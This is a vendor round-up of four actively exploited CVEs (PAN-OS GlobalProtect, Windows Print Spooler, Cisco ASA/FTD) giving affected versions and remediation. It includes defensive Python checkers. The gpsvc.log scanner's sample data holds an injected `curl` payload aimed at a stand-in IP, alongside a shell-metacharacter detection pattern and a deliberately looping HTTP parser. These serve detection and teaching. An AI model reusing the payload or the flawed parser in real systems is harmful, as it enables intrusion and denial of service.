Known Actively Exploited Vulnerabilities Round-up (19.04.24-25.04.24)

This article covers recent vulnerabilities found to be actively exploited in the wild. Each entry is categorised by the class of weakness exploited and sets out its impact, the versions affected, and the vendor's official fix and remediation guidance.

 

CVE-2024-3400

Category: Command Injection

 

Versions Affected:

  • PAN-OS 10.2 prior to release 10.2.9-h1
  • PAN-OS 11.0 prior to release 11.0.4-h1
  • PAN-OS 11.1 prior to release 11.1.2-h3

 

(Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.)

 

Vulnerability Summary:

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software may enable an unauthenticated, remote attacker to execute arbitrary code with root privileges on the firewall. A firewall is exposed when a GlobalProtect gateway or GlobalProtect portal (or both) is configured. The vendor's original advisory also required device telemetry to be enabled, but it has since clarified that device telemetry does not need to be enabled for a firewall to be exposed, so telemetry settings should not be relied on when assessing exposure.

The underlying weakness is that the product builds all or part of an OS command from externally influenced input without correctly neutralising the special elements that can change the command's meaning. Because the vulnerable code path runs with root privileges, the injected commands do too: a successful exploit gives the attacker complete control of the appliance rather than a foothold constrained by least privilege.

 

Official Fix & Remediation Guidance:

  • Customers with a Threat Prevention subscription should block attacks by enabling Threat ID 95187, together with any further Threat IDs the vendor has since published for this CVE, and must ensure that the vulnerability protection profile is applied to the GlobalProtect interface. Disabling device telemetry was initially offered as a mitigation, but the vendor has since withdrawn it as ineffective, so it should not be relied on.
  • Fixes were released on April 14, 2024 as PAN-OS 10.2.9-h1, 11.0.4-h1 and 11.1.2-h3, and the vendor has since published hotfixes for earlier maintenance releases in these trains. Customers should upgrade to a fixed release as soon as possible, consult the vendor advisory for the current list of fixed versions, and follow its guidance on checking whether a device was compromised before it was patched.

 

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.
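A practical way to operationalise the two checks above (is the firewall on a fixed release, and is there evidence of exploitation attempts) is a short script. The following is an added example written for this round-up, not Palo Alto Networks' code. The version logic encodes only the three fixed releases listed above, so a "vulnerable" verdict for an earlier maintenance release that later received its own hotfix must be confirmed against the current vendor advisory. The log scan implements the vendor's published indicator, a `failed to unmarshal session(...)` entry in mp-log gpsvc.log whose value is not a GUID but a path or shell fragment; the sample log lines are constructed for illustration and are not taken from a real device.

```python
import re
from typing import Iterable, List, Tuple

# Fixed releases named in the advisory. Any earlier release in the same
# major.minor train is exposed; trains not listed here are not affected.
# Caveat: the vendor later published hotfixes for earlier maintenance releases
# in these trains, so confirm a "vulnerable" verdict for such a release against
# the current advisory before acting on it.
FIXED_RELEASES = {
    (10, 2): (10, 2, 9, 1),   # 10.2.9-h1
    (11, 0): (11, 0, 4, 1),   # 11.0.4-h1
    (11, 1): (11, 1, 2, 3),   # 11.1.2-h3
}

_PANOS_VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos(version: str) -> Tuple[int, int, int, int]:
    """Parse 'MAJOR.MINOR.MAINT[-hN]' into a comparable tuple.

    A base maintenance release (no -h suffix) sorts as hotfix 0, so
    '10.2.9' compares lower than '10.2.9-h1', as the advisory intends."""
    m = _PANOS_VERSION.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


def is_vulnerable(version: str) -> bool:
    """True when `version` is in an affected train and below its fixed release."""
    parsed = parse_panos(version)
    fixed = FIXED_RELEASES.get(parsed[:2])
    return fixed is not None and parsed < fixed


# The vendor's own check is:  grep pattern "failed to unmarshal session(." mp-log gpsvc.log*
# A value between "session(" and ")" that is not a GUID but carries a path or
# shell fragment indicates an exploitation attempt.
_UNMARSHAL = re.compile(r"failed to unmarshal session\((.*)\)")
_GUID = re.compile(r"^[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$")
_PATH_OR_SHELL = re.compile(r"\.\./|/|`|\$\(|\$\{|;|\|")


def suspicious_sessions(lines: Iterable[str]) -> List[str]:
    """Return non-GUID session values that carry path traversal or shell metacharacters."""
    hits: List[str] = []
    for line in lines:
        m = _UNMARSHAL.search(line)
        if not m:
            continue
        value = m.group(1)
        if _GUID.match(value) or not _PATH_OR_SHELL.search(value):
            continue
        hits.append(value)
    return hits


# Constructed sample lines in the spirit of gpsvc.log; not a real capture.
SAMPLE_GPSVC_LOG = [
    "2024-04-12 01:00:01 gpsvc: failed to unmarshal session(7f2c9a3e-1b4d-4e6f-9a8b-0c1d2e3f4a5b)",
    "2024-04-12 01:00:02 gpsvc: failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/`curl${IFS}198.51.100.7`)",
    "2024-04-12 01:00:03 gpsvc: session refresh completed",
]

if __name__ == "__main__":
    for v in ("10.2.9", "10.2.9-h1", "11.1.2-h3", "10.1.11"):
        print(f"{v:10s} vulnerable={is_vulnerable(v)}")
    for hit in suspicious_sessions(SAMPLE_GPSVC_LOG):
        print("suspicious session value:", hit)
```

Run it against the output of `show system info` (for the version) and a copy of the gpsvc.log files pulled from the appliance; any hit from `suspicious_sessions` warrants treating the device as potentially compromised rather than merely unpatched.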

 

 

CVE-2022-38028

Category: Dynamic Loading & Untrusted Search Path

 

Versions Affected:

Affected Products (Desktop Operating Systems):

  • Microsoft Windows 8.1 for x64-based systems prior to release 6.3.9600.20625
  • Microsoft Windows 8.1 for 32-bit systems prior to release 6.3.9600.20625
  • Microsoft Windows 10 Version 1607 for x64-based Systems prior to release 10.0.14393.5427
  • Microsoft Windows 10 Version 1607 for 32-bit Systems prior to release 10.0.14393.5427
  • Microsoft Windows 10 for x64-based Systems prior to release 10.0.10240.19507
  • Microsoft Windows 10 for 32-bit Systems prior to release 10.0.10240.19507
  • Microsoft Windows 10 Version 21H1 for 32-bit Systems prior to release 10.0.19043.2130
  • Microsoft Windows 10 Version 1809 for 32-bit Systems prior to release 10.0.17763.3532
  • Microsoft Windows 10 Version 20H2 for ARM64-based Systems prior to release 10.0.19042.2130
  • Microsoft Windows 10 Version 20H2 for 32-bit Systems prior to release 10.0.19042.2130
  • Microsoft Windows 10 Version 21H1 for ARM64-based Systems prior to release 10.0.19043.2130
  • Microsoft Windows 10 Version 21H1 for x64-based Systems prior to release 10.0.19043.2130
  • Microsoft Windows 10 Version 1809 for ARM64-based Systems prior to release 10.0.17763.3532
  • Microsoft Windows 10 Version 1809 for x64-based Systems prior to release 10.0.17763.3532
  • Microsoft Windows 10 Version 21H2 for x64-based Systems prior to release 10.0.19044.2130
  • Microsoft Windows 10 Version 21H2 for ARM64-based Systems prior to release 10.0.19044.2130
  • Microsoft Windows 10 Version 21H2 for 32-bit Systems prior to release 10.0.19044.2130
  • Microsoft Windows 11 Version 22H2 for x64-based Systems prior to release 10.0.22621.674
  • Microsoft Windows 11 Version 22H2 for ARM64-based Systems prior to release 10.0.22621.674
  • Microsoft Windows 11 version 21H2 for ARM64-based Systems prior to release 10.0.22000.1098
  • Microsoft Windows 11 version 21H2 for x64-based Systems prior to release 10.0.22000.1098

 

Affected Products (Server Operating Systems):

  • Microsoft Windows Server 2012 R2 (Server Core installation) prior to release 6.3.9600.20625
  • Microsoft Windows Server 2012 R2 prior to release 6.3.9600.20625
  • Microsoft Windows Server 2012 prior to release 6.2.9200.23920
  • Microsoft Windows Server 2012 (Server Core installation) prior to release 6.2.9200.23920
  • Microsoft Windows Server 2016 (Server Core installation) prior to release 10.0.14393.5427
  • Microsoft Windows Server 2016 prior to release 10.0.14393.5427
  • Microsoft Windows Server 2019 (Server Core installation) prior to release 10.0.17763.3532
  • Microsoft Windows Server 2019 prior to release 10.0.17763.3532
  • Microsoft Windows Server 2022 prior to release 10.0.20348.1129
  • Microsoft Windows Server 2022 (Server Core installation) prior to release 10.0.20348.1129

 

Affected Products (Mobile Operating Systems):

  • Microsoft Windows RT 8.1 prior to release 6.3.9600.20625

 

Vulnerability Summary:

A security issue has been identified in the Microsoft Windows Print Spooler component that allows a local attacker who already has a foothold on the host to elevate their privileges to SYSTEM. In the exploitation observed by Microsoft, the GooseEgg tool modifies a JavaScript constraints file and has the Print Spooler execute it with SYSTEM-level permissions. The flaw is understood to stem from inadequate sanitisation and normalisation of file names, allowing an attacker-supplied library to be loaded in place of a legitimate one (DLL hijacking).

The weakness class is an untrusted search path: the product locates a critical resource, such as a library, using a search path that can be influenced from outside and that points to locations not under the product's control. An attacker who can write to such a location can plant a file of the expected name and have the privileged process load and execute it, read data it should not have access to, or alter configuration.

The Print Spooler has previously been the target of similar vulnerabilities, collectively known as "PrintNightmare", including CVE-2021-34527.

 

Official Fix & Remediation Guidance:

Anyone administering Windows machines should ensure that the fix for CVE-2022-38028 has been installed, together with the fix for CVE-2021-34527, the earlier critical zero-day in the same component that came under mass attack in 2021. Where the Print Spooler service is not required, for example on domain controllers and other servers that never print, disabling the service removes this attack surface altogether.

Microsoft released the security update for the Print Spooler vulnerability exploited by GooseEgg on October 11, 2022; see https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028. Customers who have not yet applied it are urged to do so as soon as possible.

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.
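To check a fleet against the build list above, the following added example (written for this article, not Microsoft's code) encodes the minimum fixed Update Build Revision (UBR) for each listed build and classifies an OS build string as patched, vulnerable or unknown. The `local_build` helper reads the UBR from the registry and is only exercised on Windows; elsewhere the script falls back to a constructed example string. A build not in the list (for instance Windows 10 22H2, build 19045, which shipped after this update and is not named above) is reported as unknown rather than guessed at, and should be checked against the MSRC entry.

```python
import sys
from typing import Dict, Optional, Tuple

# Minimum fixed build per (major, minor, build), taken from the affected-version
# list above. The last component of a Windows build string is the Update Build
# Revision (UBR); a host whose UBR is below the value here lacks the October 2022 fix.
FIXED_UBR: Dict[Tuple[int, int, int], int] = {
    (6, 2, 9200): 23920,    # Windows Server 2012
    (6, 3, 9600): 20625,    # Windows 8.1, Windows RT 8.1, Windows Server 2012 R2
    (10, 0, 10240): 19507,  # Windows 10 (original release)
    (10, 0, 14393): 5427,   # Windows 10 1607, Windows Server 2016
    (10, 0, 17763): 3532,   # Windows 10 1809, Windows Server 2019
    (10, 0, 19042): 2130,   # Windows 10 20H2
    (10, 0, 19043): 2130,   # Windows 10 21H1
    (10, 0, 19044): 2130,   # Windows 10 21H2
    (10, 0, 20348): 1129,   # Windows Server 2022
    (10, 0, 22000): 1098,   # Windows 11 21H2
    (10, 0, 22621): 674,    # Windows 11 22H2
}


def parse_build(version: str) -> Tuple[int, int, int, int]:
    """Parse 'MAJOR.MINOR.BUILD.UBR' (e.g. '10.0.19044.2130') into integers."""
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"expected MAJOR.MINOR.BUILD.UBR, got {version!r}")
    major, minor, build, ubr = (int(p) for p in parts)
    return major, minor, build, ubr


def assess(version: str) -> str:
    """Return 'patched', 'vulnerable', or 'unknown' when the build is not in the advisory list."""
    major, minor, build, ubr = parse_build(version)
    fixed = FIXED_UBR.get((major, minor, build))
    if fixed is None:
        return "unknown"
    return "patched" if ubr >= fixed else "vulnerable"


def local_build() -> Optional[str]:
    """On Windows, assemble the running OS build string; None on other platforms.

    sys.getwindowsversion() does not expose the UBR, so it is read from the
    registry value UBR under HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only module
    ver = sys.getwindowsversion()
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion") as key:
        ubr, _ = winreg.QueryValueEx(key, "UBR")
    return f"{ver.major}.{ver.minor}.{ver.build}.{ubr}"


if __name__ == "__main__":
    # Constructed fallback string so the demonstration runs on non-Windows hosts.
    target = local_build() or "10.0.19044.2129"
    print(target, "->", assess(target))
```

Feed `assess` build strings collected by your inventory tooling (for example the `OsVersion`/UBR pair that endpoint management agents report) and escalate anything classed as vulnerable or unknown, rather than only those already confirmed vulnerable.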

 

 

CVE-2024-20359

Category: Privilege Escalation

 

Versions Affected:

  • Cisco ASA (awaiting full list of impacted versions from vendor)
  • Cisco FTD (awaiting full list of impacted versions from vendor)

 

Vulnerability Summary:

A vulnerability in a legacy capability of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software, which allowed VPN clients and plug-ins to be preloaded onto the device, could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit it.

The vulnerability is due to improper validation of a file when it is read from system flash memory. An attacker could exploit it by copying a crafted file to the disk0: file system of an affected device; the code it carries is executed when the device next reloads, which also makes the flaw a persistence mechanism that survives reboots. Administrators should therefore treat unexpected files on disk0: of an affected device as a potential indicator of compromise and follow the vendor's advisory on how to check for them.

 

Official Fix & Remediation Guidance:

Cisco has released software updates that address this vulnerability. Customers are advised to upgrade to the latest version of the impacted product.

To upgrade to a fixed release of Cisco FTD Software, customers can do one of the following:

  • For devices that are managed by using Cisco Firepower Management Center (FMC), use the FMC interface to install the upgrade. After installation is complete, reapply the access control policy.
  • For devices that are managed by using Cisco Firepower Device Manager (FDM), use the FDM interface to install the upgrade. After installation is complete, reapply the access control policy.

 

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.

 

 

CVE-2024-20353

Category: Denial of Service (DoS)

 

Versions Affected:

  • Cisco ASA (awaiting full list of impacted versions from vendor)
  • Cisco FTD (awaiting full list of impacted versions from vendor)

 

Vulnerability Summary:

Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software contain an infinite loop vulnerability that could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service condition. The vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker could exploit it by sending a crafted HTTP request to a targeted web server on the device, so exposure depends on which web-based services (such as management access or remote access VPN) are enabled on the device's interfaces.
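The root cause in ASA/FTD is not described beyond what Cisco's summary says, so the following is an added illustration of the weakness class (an infinite loop caused by incomplete error checking in an HTTP header parser, CWE-835) and is not Cisco's code. The weak parser assumes every header line is CRLF-terminated and, when the terminator is missing, neither advances nor fails, so a single truncated request pins the thread; the hardened version makes every path through the loop either progress or raise, and bounds input size and header count. The request bytes are constructed for the example.

```python
from typing import Callable, Dict, Type

MAX_HEADER_BYTES = 8192   # bound the work a single request can demand
MAX_HEADERS = 100


def parse_headers_weak(raw: bytes, budget: int = 10_000) -> Dict[str, str]:
    """Illustrative weak parser (CWE-835 pattern): every header line is assumed to be
    CRLF-terminated. When find() reports no terminator (-1), the loop neither advances
    `pos` nor raises, so a request whose last header line is truncated spins forever.
    `budget` exists only so this demonstration terminates instead of hanging."""
    headers: Dict[str, str] = {}
    pos = 0
    iterations = 0
    while pos < len(raw):
        iterations += 1
        if iterations > budget:
            raise RuntimeError("no forward progress: the real loop would never terminate")
        end = raw.find(b"\r\n", pos)
        if end == pos:            # empty line ends the header block
            break
        if end == -1:
            continue              # BUG: incomplete error handling; nothing changes between iterations
        name, _, value = raw[pos:end].partition(b":")
        headers[name.decode("latin-1").strip().lower()] = value.decode("latin-1").strip()
        pos = end + 2
    return headers


def parse_headers_hardened(raw: bytes) -> Dict[str, str]:
    """Every path through the loop either advances `pos` or raises, and input size
    and header count are bounded, so a crafted request can at worst be rejected."""
    if len(raw) > MAX_HEADER_BYTES:
        raise ValueError("header block exceeds size limit")
    headers: Dict[str, str] = {}
    pos = 0
    while pos < len(raw):
        end = raw.find(b"\r\n", pos)
        if end == -1:
            raise ValueError("truncated header line")      # fail closed instead of retrying
        if end == pos:
            break
        line = raw[pos:end]
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ValueError(f"malformed header line: {line!r}")
        if len(headers) >= MAX_HEADERS:
            raise ValueError("too many header fields")
        headers[name.decode("latin-1").strip().lower()] = value.decode("latin-1").strip()
        pos = end + 2
    return headers


def raises(fn: Callable[..., object], exc: Type[BaseException], *args: object) -> bool:
    """Demonstration helper: True if fn(*args) raises exc."""
    try:
        fn(*args)
    except exc:
        return True
    return False


# Constructed inputs for the demonstration (not captured traffic).
WELL_FORMED = b"Host: asa.example.net\r\nUser-Agent: check\r\n\r\n"
TRUNCATED = b"Host: asa.example.net\r\nX-Partial: no-terminator"

if __name__ == "__main__":
    print(parse_headers_hardened(WELL_FORMED))
    print("weak parser loops on truncated input:", raises(parse_headers_weak, RuntimeError, TRUNCATED))
    print("hardened parser rejects it:", raises(parse_headers_hardened, ValueError, TRUNCATED))
```

The defensive pattern to take away is that any parsing loop driven by untrusted bytes should be reviewed for a branch that neither consumes input nor exits; when such loops run inside a single-threaded data plane, as on a network appliance, one malformed request is enough to take the device down.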

 

Official Fix & Remediation Guidance:

Cisco has released software updates that address this vulnerability. Customers are advised to upgrade to the latest version of the impacted product.

To upgrade to a fixed release of Cisco FTD Software, customers can do one of the following:

  • For devices that are managed by using Cisco Firepower Management Center (FMC), use the FMC interface to install the upgrade. After installation is complete, reapply the access control policy.
  • For devices that are managed by using Cisco Firepower Device Manager (FDM), use the FDM interface to install the upgrade. After installation is complete, reapply the access control policy.

 

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.

 

 

About AppCheck

AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations' websites, applications, networks and cloud infrastructure. AppCheck is authorised by the Common Vulnerabilities and Exposures (CVE) Program as a CVE Numbering Authority (CNA).
